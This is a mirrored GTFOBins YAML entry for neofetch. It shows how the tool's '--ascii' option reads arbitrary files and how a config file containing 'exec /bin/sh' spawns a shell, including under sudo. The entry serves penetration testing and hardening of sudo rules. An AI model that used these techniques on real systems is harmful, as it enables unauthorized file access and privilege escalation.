1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-08 06:56:15 +01:00
GTFOBins.github.io/_gtfobins/neofetch
2026-01-06 17:44:19 +01:00

20 lines
424 B
Plaintext

---
functions:
file-read:
- binary: false
code: |-
neofetch --ascii /path/to/input-file
comment: |-
The file content is used as the logo while some other information is displayed on its right.
contexts:
sudo:
unprivileged:
shell:
- code: |-
echo 'exec /bin/sh' >/path/to/temp-file
neofetch --config /path/to/temp-file
contexts:
sudo:
unprivileged:
...